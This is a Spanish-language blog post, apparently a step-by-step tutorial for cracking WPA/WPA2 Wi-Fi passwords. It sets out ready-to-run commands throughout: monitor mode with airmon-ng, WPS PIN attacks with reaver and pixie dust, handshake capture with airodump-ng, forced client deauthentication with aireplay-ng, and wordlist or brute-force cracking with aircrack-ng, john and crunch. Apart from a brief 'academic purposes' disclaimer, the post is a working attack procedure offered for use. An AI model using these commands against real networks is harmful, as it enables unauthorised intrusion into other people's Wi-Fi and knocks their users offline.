miércoles, 15 de mayo de 2013

[LINUX] Crackear una WPA/WPA2 con airodump, aireplay, aircrack y una lista de palabras

ACTUALIZADO 2016-12-15 Esta entrada, se hace únicamente con propósitos meramente académicos sobre como acceder a una red inalambrica, cualquier uso delictivo que se le de a esta información, está fuera de mi responsabilidad.
 
Primero debemos habilitar el monitoreo en la interfaz de red inalámbrica. 
Para habilitar este monitoreo debemos ejecutar el comando airmon-ng, es importante que cuando se utilice este monitoreo no exista en ejecución ningún proceso que utilice la red inalambrica, de lo contrario se va a retrasar o no va a funcionar bien el monitoreo. Dejo un comando para matar cualquier proceso que utilice la interfáz de red inalambrica y el de iniciar el monitoreo.
Matar cualquier proceso (A veces se debe ejecutar varias veces):
airmon-ng check kill

Iniciar el modo de monitoreo:
airmon-ng start <NOMBRE_INTERFAZ>
Ejemplo: airmon-ng start wlan0

Una vez se tenga este monitoreo que por lo general se le asigna el nombre mon0 o wlan0mon, se pueden hacer dos formas de hackeo, la más sencilla es con reaver, pero funciona solo si el router o access point tiene la opción WPS activada. De lo contrario podemos ejecutar el airodump-ng para capturar paquetes e intentar capturar un handshake (saludo cuando se conecta un usuario a la red).
Para hackear una red con WPS activo (forma más simple), debemos utilizar reaver con los siguientes parámetros (el parámetro -K es solo si tenemos instalada la versión de reaver modificada que permite un hackeo utilizando pixie dust, que es un método que no siempre funciona pero que agiliza el proceso de hackeo, y permite dar con el pin de WPS en unos minutos):
reaver -i <NOMBRE_INTERFAZ> -b <MAC_ACCESS_POINT> -c <CANAL> [-K 1]
Ejemplos: 
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 11 -K 1 #Dura menos pero requiere versión modificada de reaver
reaver -i wlan0mon -b 00:11:22:33:44:55 -c 11

 airodump-ng -w prefijo_captura --bssid <MAC_ACCESS_POINT> -c <CHANNEL> <INTERFAZ_MONITOREO>  
Ejemplo: airodump-ng -w captura --bssid 00:11:22:33:44:55 -c 11 wlan0mon

Una vez tengamos esto debemos esperar a que se realice algún handshake (puede darse en una conexión exitosa) que el airodump pueda capturar (requiere que existan clientes en el access point), para esto podemos forzar una desconexión de alguno de los clientes conectados para que este tenga que volver a realizar un handshake y poder capturarlo (Es necesario que el comando anterior esté en ejecución al momento de hacer este otro comando): 
 aireplay-ng --deauth <INTENTOS> -a <MAC_ACCESS_POINT> -c <MAC_CLIENTE> <INTERFAZ_MONITOREO>  
Ejemplo: aireplay-ng --deauth 999 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 wlan0mon

Una vez exita aparezca en el airodump el handshake registrado, se procede a utilizar el aircrack para intentar descifrar el password utilizando una lista de palabras o la fuerza bruta: 
 aircrack-ng <ARCHIVO_DE_CAPTURA> -w <ARCHIVO_DE_PALABRAS> -l <ARCHIVO_ALMACENA_PASSWORD>
 <ARCHIVO_DE_CAPTURA> = Por lo general se llama capture-01.cap, siendo 01 el consecutivo de cuantas veces se haya realizado capturas.  
Ejemplo: aircrack-ng captura-01.cap -w lista_palabras.txt -l contraseña_lista.txt

Tambien se puede utilizar alguna utilidad como john o hashcat o crunch para generar contrasenas por fuerza bruta (modo maś lento pero seguro requiere de una computadora con buen procesador para que dure menos tiempo, pero siempre puede durar días enteros)(para revisar cuales modos tienen instalados de john pueden hacer un "ls -l /usr/share/john/*.chr"):
 john --incremental=<MODE> --stdout=<LARGO> | aircrack-ng -a [WEP=1|WPA=2] -b <MAC_ACCESS_POINT> -w - <ARCHIVO_DE_CAPTURA>  
Ejemplo: john --incremental=digits --stdout=12 | aircrack-ng -a 2 -b 00:11:22:33:44:55 -w - captura-01.cap

crunch <LARGO_MIN> <LARGO_MAX> <CARACTERES_A_PROBAR> | <COMANDO_DE_AIRCRACK>
Ejemplo: crunch 8 8 abcdefghijklmnñopqrstuvwxyz\ \-0123456789 | aircrack-ng -a 2 -b 00:11:22:33:44:55 -w - captura-01.cap -l contraseña_lista.txt

No hay comentarios.:

Publicar un comentario